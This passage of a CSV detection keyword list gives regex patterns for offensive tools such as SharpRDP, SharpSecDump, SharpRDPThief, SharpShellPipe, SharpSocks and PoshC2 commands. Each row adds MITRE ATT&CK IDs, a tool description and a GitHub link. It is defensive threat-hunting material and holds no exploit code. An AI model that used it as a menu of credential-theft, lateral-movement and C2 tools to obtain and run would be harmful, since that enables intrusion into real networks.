Movement","https://github.com/juliourena/SharpNoPSExec","1","1","N/A","10","6","587","88","2022-06-03T10:32:55Z","2021-04-24T22:02:38Z" "*SharpPack*",".{0,1000}SharpPack.{0,1000}","offensive_tool_keyword","SharpPack","SharpPack is a toolkit for insider threat assessments that lets you defeat application whitelisting to execute arbitrary DotNet and PowerShell tools.","T1218.010 - T1218.011 
- T1059 - T1127 - T1055","TA0002 - TA0008 - TA0006","N/A","N/A","POST Exploitation tools","https://github.com/mdsecactivebreach/SharpPack","1","0","N/A","N/A","2","145","34","2018-12-17T11:55:12Z","2018-12-17T10:51:19Z" "*SharpPersistSD.RegHelper*",".{0,1000}SharpPersistSD\.RegHelper.{0,1000}","offensive_tool_keyword","SharpPersistSD","A Post-Compromise granular .NET library to embed persistency to persistency by abusing Security Descriptors of remote machines","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/cybersectroll/SharpPersistSD","1","0","N/A","10","1","N/A","N/A","N/A","N/A" "*SharpPersistSD.SecurityDescriptor*",".{0,1000}SharpPersistSD\.SecurityDescriptor.{0,1000}","offensive_tool_keyword","SharpPersistSD","A Post-Compromise granular .NET library to embed persistency to persistency by abusing Security Descriptors of remote machines","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/cybersectroll/SharpPersistSD","1","0","N/A","10","1","N/A","N/A","N/A","N/A" "*SharpPersistSD.SvcHelper*",".{0,1000}SharpPersistSD\.SvcHelper.{0,1000}","offensive_tool_keyword","SharpPersistSD","A Post-Compromise granular .NET library to embed persistency to persistency by abusing Security Descriptors of remote machines","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/cybersectroll/SharpPersistSD","1","0","N/A","10","1","N/A","N/A","N/A","N/A" "*SharpPrinter.exe*",".{0,1000}SharpPrinter\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*SharpPrintNightmare*",".{0,1000}SharpPrintNightmare.{0,1000}","offensive_tool_keyword","SharpPrintNightmare","C# and Impacket implementation of PrintNightmare CVE-2021-1675/CVE-2021-34527","T1210 - T1574 - T1204 - T1053 - T1021 - T1068 - T1071","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Exploitation tools","https://github.com/cube0x0/CVE-2021-1675","1","1","N/A","N/A","10","1790","580","2021-07-20T15:28:13Z","2021-06-29T17:24:14Z" "*sharpps $psversiontable*",".{0,1000}sharpps\s\$psversiontable.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*sharpps get-process*",".{0,1000}sharpps\sget\-process.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used 
to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*sharppsexec*",".{0,1000}sharppsexec.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*SharpPsExecManager*",".{0,1000}SharpPsExecManager.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*SharpPsExecService.*",".{0,1000}SharpPsExecService\..{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*SharpRDP.*.dll.bin*",".{0,1000}SharpRDP\..{0,1000}\.dll\.bin.{0,1000}","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET 
Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","1","N/A","10","10","958","453","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z" "*SharpRDP.csproj*",".{0,1000}SharpRDP\.csproj.{0,1000}","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","1","N/A","10","10","958","453","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z" "*SharpRDP.exe*",".{0,1000}SharpRDP\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*SharpRDP.exe*",".{0,1000}SharpRDP\.exe.{0,1000}","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","1","N/A","10","10","958","453","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z" "*SharpRDP.sln*",".{0,1000}SharpRDP\.sln.{0,1000}","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - 
T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","1","N/A","10","10","958","453","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z" "*SharpRDPHijack.cs*",".{0,1000}SharpRDPHijack\.cs.{0,1000}","offensive_tool_keyword","SharpRDPHijack","SharpRDPHijack is a proof-of-concept .NET/C# Remote Desktop Protocol (RDP) session hijack utility for disconnected sessions","T1021.001 - T1078.003 - T1059.001","TA0002 - TA0008 - TA0006","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/bohops/SharpRDPHijack","1","1","N/A","10","5","407","71","2021-07-25T17:36:01Z","2020-07-06T02:59:46Z" "*SharpRDPHijack.exe*",".{0,1000}SharpRDPHijack\.exe.{0,1000}","offensive_tool_keyword","SharpRDPHijack","SharpRDPHijack is a proof-of-concept .NET/C# Remote Desktop Protocol (RDP) session hijack utility for disconnected sessions","T1021.001 - T1078.003 - T1059.001","TA0002 - TA0008 - TA0006","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/bohops/SharpRDPHijack","1","1","N/A","10","5","407","71","2021-07-25T17:36:01Z","2020-07-06T02:59:46Z" "*SharpRDPHijack-master*",".{0,1000}SharpRDPHijack\-master.{0,1000}","offensive_tool_keyword","SharpRDPHijack","SharpRDPHijack is a proof-of-concept .NET/C# Remote Desktop Protocol (RDP) session hijack utility for disconnected sessions","T1021.001 - T1078.003 - T1059.001","TA0002 - TA0008 - TA0006","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/bohops/SharpRDPHijack","1","1","N/A","10","5","407","71","2021-07-25T17:36:01Z","2020-07-06T02:59:46Z" "*SharpRDP-master*",".{0,1000}SharpRDP\-master.{0,1000}","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","1","N/A","10","10","958","453","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z" 
"*SharpRDPThief is a C# implementation of RDPThief*",".{0,1000}SharpRDPThief\sis\sa\sC\#\simplementation\sof\sRDPThief.{0,1000}","offensive_tool_keyword","SharpRDPThief","A C# implementation of RDPThief to steal credentials from RDP","T1056.004 - T1110 - T1563.002","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/passthehashbrowns/SharpRDPThief","1","0","N/A","10","2","154","28","2020-08-28T03:48:51Z","2020-08-26T22:27:36Z" "*SharpRDPThief.csproj*",".{0,1000}SharpRDPThief\.csproj.{0,1000}","offensive_tool_keyword","SharpRDPThief","A C# implementation of RDPThief to steal credentials from RDP","T1056.004 - T1110 - T1563.002","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/passthehashbrowns/SharpRDPThief","1","1","N/A","10","2","154","28","2020-08-28T03:48:51Z","2020-08-26T22:27:36Z" "*SharpRDPThief.exe*",".{0,1000}SharpRDPThief\.exe.{0,1000}","offensive_tool_keyword","SharpRDPThief","A C# implementation of RDPThief to steal credentials from RDP","T1056.004 - T1110 - T1563.002","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/passthehashbrowns/SharpRDPThief","1","1","N/A","10","2","154","28","2020-08-28T03:48:51Z","2020-08-26T22:27:36Z" "*Sharpreflect *",".{0,1000}Sharpreflect\s.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*SharpReg.exe*",".{0,1000}SharpReg\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*SharpRoast.exe*",".{0,1000}SharpRoast\.exe.{0,1000}","offensive_tool_keyword","Ghostpack-CompiledBinaries","Compiled Binaries for Ghostpack","T1140 - T1559.002 - T1547.002 - T1055 - T1036.004","TA0005 - TA0002 - TA0040 - TA0036","N/A","N/A","Exploitation Tools","https://github.com/r3motecontrol/Ghostpack-CompiledBinaries","1","1","N/A","N/A","10","1009","205","2022-11-08T02:58:06Z","2018-07-25T23:38:15Z" "*sharpsc *cmd*",".{0,1000}sharpsc\s.{0,1000}cmd.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*SharpSCCM*",".{0,1000}SharpSCCM.{0,1000}","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. 
formerly SCCM) for Lateral Movement and credential gathering without requiring access to the SCCM administration console GUI","T1003 - T1021 - T1056 - T1059 - T1075 - T1078 - T1087 - T1098 - T1105 - T1110 - T1212 - T1547 - T1552 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/Mayyhem/SharpSCCM/","1","1","N/A","N/A","5","499","70","2024-04-15T16:18:32Z","2021-08-19T05:09:19Z" "*SharpSCCM.exe*",".{0,1000}SharpSCCM\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*SharpSCShell*",".{0,1000}SharpSCShell.{0,1000}","offensive_tool_keyword","cobaltstrike","Fileless Lateral Movement tool that relies on ChangeServiceConfigA to run command","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - 
T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Mr-Un1k0d3r/SCShell","1","1","N/A","10","10","1331","230","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z" "*SharpSearch.exe*",".{0,1000}SharpSearch\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*SharpSecDump Info*",".{0,1000}SharpSecDump\sInfo.{0,1000}","offensive_tool_keyword","SharpSecDump",".Net port of the remote SAM + LSA Secrets dumping functionality of impacket's secretsdump.py","T1003 - T1558","TA0006","N/A","N/A","Credential Access","https://github.com/G0ldenGunSec/SharpSecDump","1","0","N/A","10","6","558","73","2023-02-16T18:47:26Z","2020-09-01T04:30:24Z" "*SharpSecDump.csproj*",".{0,1000}SharpSecDump\.csproj.{0,1000}","offensive_tool_keyword","SharpSecDump",".Net port of the remote SAM + LSA Secrets dumping functionality of impacket's secretsdump.py","T1003 - T1558","TA0006","N/A","N/A","Credential 
Access","https://github.com/G0ldenGunSec/SharpSecDump","1","1","N/A","10","6","558","73","2023-02-16T18:47:26Z","2020-09-01T04:30:24Z" "*SharpSecDump.exe*",".{0,1000}SharpSecDump\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*SharpSecDump.exe*",".{0,1000}SharpSecDump\.exe.{0,1000}","offensive_tool_keyword","SharpSecDump",".Net port of the remote SAM + LSA Secrets dumping functionality of impacket's secretsdump.py","T1003 - T1558","TA0006","N/A","N/A","Credential Access","https://github.com/G0ldenGunSec/SharpSecDump","1","1","N/A","10","6","558","73","2023-02-16T18:47:26Z","2020-09-01T04:30:24Z" "*SharpSecDump.sln*",".{0,1000}SharpSecDump\.sln.{0,1000}","offensive_tool_keyword","SharpSecDump",".Net port of the remote SAM + LSA Secrets dumping functionality of impacket's secretsdump.py","T1003 - T1558","TA0006","N/A","N/A","Credential Access","https://github.com/G0ldenGunSec/SharpSecDump","1","1","N/A","10","6","558","73","2023-02-16T18:47:26Z","2020-09-01T04:30:24Z" "*SharpSecDump-master*",".{0,1000}SharpSecDump\-master.{0,1000}","offensive_tool_keyword","SharpSecDump",".Net port of the remote SAM + LSA Secrets dumping functionality of impacket's secretsdump.py","T1003 - T1558","TA0006","N/A","N/A","Credential 
Access","https://github.com/G0ldenGunSec/SharpSecDump","1","1","N/A","10","6","558","73","2023-02-16T18:47:26Z","2020-09-01T04:30:24Z" "*sharpsecretsdump*",".{0,1000}sharpsecretsdump.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","1","private github repo","10","N/A","N/A","N/A","N/A","N/A" "*SharpShares.csproj*",".{0,1000}SharpShares\.csproj.{0,1000}","offensive_tool_keyword","SharpShares","Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain","T1046 - T1135","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/Hackcraft-Labs/SharpShares","1","1","N/A","9","1","29","6","2023-11-13T14:08:07Z","2023-10-25T10:34:18Z" "*SharpShares.exe*",".{0,1000}SharpShares\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*SharpShares.exe*",".{0,1000}SharpShares\.exe.{0,1000}","offensive_tool_keyword","SharpShares","Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain","T1046 - T1135","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/Hackcraft-Labs/SharpShares","1","1","N/A","9","1","29","6","2023-11-13T14:08:07Z","2023-10-25T10:34:18Z" 
"*SharpShares.sln*",".{0,1000}SharpShares\.sln.{0,1000}","offensive_tool_keyword","SharpShares","Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain","T1046 - T1135","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/Hackcraft-Labs/SharpShares","1","1","N/A","9","1","29","6","2023-11-13T14:08:07Z","2023-10-25T10:34:18Z" "*SharpShellPipe.exe*",".{0,1000}SharpShellPipe\.exe.{0,1000}","offensive_tool_keyword","SharpShellPipe","interactive remote shell access via named pipes and the SMB protocol.","T1056.002 - T1021.002 - T1059.001","TA0005 - TA0009 - TA0002","N/A","N/A","Lateral Movement","https://github.com/DarkCoderSc/SharpShellPipe","1","1","N/A","8","2","110","14","2023-11-09T10:36:23Z","2023-08-25T15:18:30Z" "*SharpShellPipe.sln*",".{0,1000}SharpShellPipe\.sln.{0,1000}","offensive_tool_keyword","SharpShellPipe","interactive remote shell access via named pipes and the SMB protocol.","T1056.002 - T1021.002 - T1059.001","TA0005 - TA0009 - TA0002","N/A","N/A","Lateral Movement","https://github.com/DarkCoderSc/SharpShellPipe","1","1","N/A","8","2","110","14","2023-11-09T10:36:23Z","2023-08-25T15:18:30Z" "*SharpShellPipe-main*",".{0,1000}SharpShellPipe\-main.{0,1000}","offensive_tool_keyword","SharpShellPipe","interactive remote shell access via named pipes and the SMB protocol.","T1056.002 - T1021.002 - T1059.001","TA0005 - TA0009 - TA0002","N/A","N/A","Lateral Movement","https://github.com/DarkCoderSc/SharpShellPipe","1","1","N/A","8","2","110","14","2023-11-09T10:36:23Z","2023-08-25T15:18:30Z" "*SharpShooter*",".{0,1000}SharpShooter.{0,1000}","offensive_tool_keyword","SharpShooter","Payload Generation Framework","T1027 - T1564 - T1204 - T1059 - T1105","TA0002 - TA0011 - TA0008","N/A","N/A","Frameworks","https://github.com/mdsecactivebreach/SharpShooter","1","1","N/A","N/A","10","1743","343","2024-03-20T12:57:51Z","2018-03-06T20:04:20Z" "*SharpShot.exe 
/*",".{0,1000}SharpShot\.exe\s\/.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10","N/A","N/A","N/A","N/A","N/A" "*Sharp-SMBExec.exe*",".{0,1000}Sharp\-SMBExec\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*SharpSniper.exe*",".{0,1000}SharpSniper\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*SharpSocks.exe*",".{0,1000}SharpSocks\.exe.{0,1000}","offensive_tool_keyword","SharpSocks","Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell","T1090 - T1021.001","TA0002","N/A","N/A","C2","https://github.com/nettitude/SharpSocks","1","1","N/A","10","10","470","84","2023-03-15T19:19:30Z","2017-11-10T13:29:08Z" "*SharpSocks.pfx*",".{0,1000}SharpSocks\.pfx.{0,1000}","offensive_tool_keyword","SharpSocks","Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell","T1090 - T1021.001","TA0002","N/A","N/A","C2","https://github.com/nettitude/SharpSocks","1","1","N/A","10","10","470","84","2023-03-15T19:19:30Z","2017-11-10T13:29:08Z" "*SharpSocks.resx*",".{0,1000}SharpSocks\.resx.{0,1000}","offensive_tool_keyword","SharpSocks","Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell","T1090 - T1021.001","TA0002","N/A","N/A","C2","https://github.com/nettitude/SharpSocks","1","1","N/A","10","10","470","84","2023-03-15T19:19:30Z","2017-11-10T13:29:08Z" "*SharpSocks.sln*",".{0,1000}SharpSocks\.sln.{0,1000}","offensive_tool_keyword","SharpSocks","Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell","T1090 - T1021.001","TA0002","N/A","N/A","C2","https://github.com/nettitude/SharpSocks","1","1","N/A","10","10","470","84","2023-03-15T19:19:30Z","2017-11-10T13:29:08Z" 
"*SharpSocksCommon*",".{0,1000}SharpSocksCommon.{0,1000}","offensive_tool_keyword","SharpSocks","Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell","T1090 - T1021.001","TA0002","N/A","N/A","C2","https://github.com/nettitude/SharpSocks","1","1","N/A","10","10","470","84","2023-03-15T19:19:30Z","2017-11-10T13:29:08Z" "*SharpSocksConfig*",".{0,1000}SharpSocksConfig.{0,1000}","offensive_tool_keyword","SharpSocks","Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell","T1090 - T1021.001","TA0002","N/A","N/A","C2","https://github.com/nettitude/SharpSocks","1","1","N/A","10","10","470","84","2023-03-15T19:19:30Z","2017-11-10T13:29:08Z" "*SharpSocksImplant*",".{0,1000}SharpSocksImplant.{0,1000}","offensive_tool_keyword","SharpSocks","Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell","T1090 - T1021.001","TA0002","N/A","N/A","C2","https://github.com/nettitude/SharpSocks","1","1","N/A","10","10","470","84","2023-03-15T19:19:30Z","2017-11-10T13:29:08Z" "*SharpSocksServer*",".{0,1000}SharpSocksServer.{0,1000}","offensive_tool_keyword","SharpSocks","Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell","T1090 - T1021.001","TA0002","N/A","N/A","C2","https://github.com/nettitude/SharpSocks","1","1","N/A","10","10","470","84","2023-03-15T19:19:30Z","2017-11-10T13:29:08Z" 